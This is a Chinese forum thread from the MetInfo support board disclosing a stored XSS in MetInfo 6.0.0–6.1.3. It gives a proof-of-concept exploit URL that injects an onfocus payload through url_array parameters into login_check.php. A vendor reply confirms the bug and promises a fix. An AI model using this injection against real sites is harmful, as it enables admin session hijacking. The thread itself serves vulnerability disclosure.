请选择 进入手机版 | 继续访问电脑版
因履行网络发帖实名认证等法规义务,本论坛已永久关闭,如需在线交流,请移步“米拓在线问答平台

MetInfo交流平台

 找回密码
 立即注册
搜索
热搜: 模板配置 6.0
查看: 1125|回复: 2

Metinfo 6 全版本存储型XSS

[复制链接]
发表于 2018-12-26 17:57:02 | 显示全部楼层 |阅读模式
Exp:
http://127.0.0.1/admin/login/login_check.php?url_array[]=123&url_array[]=123&url_array[]=aa%22+autofocus+onfocus=alert(2)+a=%0a%0ba=&url_array[]=123
影响版本: 6.0.0,6.1.0,6.1.1,6.1.2,6.1.3 。 无需登录,访问上述链接可以在后台直接X。当管理登录后台时,切换到“安全与效率”界面,XSS可自动触发。

参考
https://github.com/Ppsoft1990/Metinfo6.1.3/issues/2



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

发表于 2018-12-31 19:43:32 | 显示全部楼层
官方没有回复的呢?难道已经修复了?我用上述链接打开 是这个提示
Not Found
The requested URL /admin/login/login.php was not found on this server.

Apache/2.4.23 (Win64) PHP/5.6.25 Server at 127.0.0.1 Port 80
回复

使用道具 举报

发表于 2019-1-2 03:23:03 | 显示全部楼层
感谢你的支持,已确认存在此问题,但利用此XSS的前提是先要获取站点的后台登录地址,我们会在下一个小版本中修复此风险隐患。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|MetInfo ( 湘ICP备07500799号 )

GMT+8, 2019-9-17 00:04 , Processed in 0.023451 second(s), 15 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表